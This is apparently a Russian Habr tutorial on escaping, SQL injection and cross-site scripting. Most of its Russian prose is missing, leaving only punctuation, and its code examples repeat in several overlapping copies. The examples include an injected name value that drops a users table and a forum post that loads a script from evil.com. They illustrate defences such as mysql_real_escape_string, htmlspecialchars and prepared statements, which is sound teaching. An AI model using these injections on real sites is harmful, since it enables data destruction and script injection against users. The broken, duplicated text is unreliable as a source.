<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
Source: https://habr.com/ru/post/182424/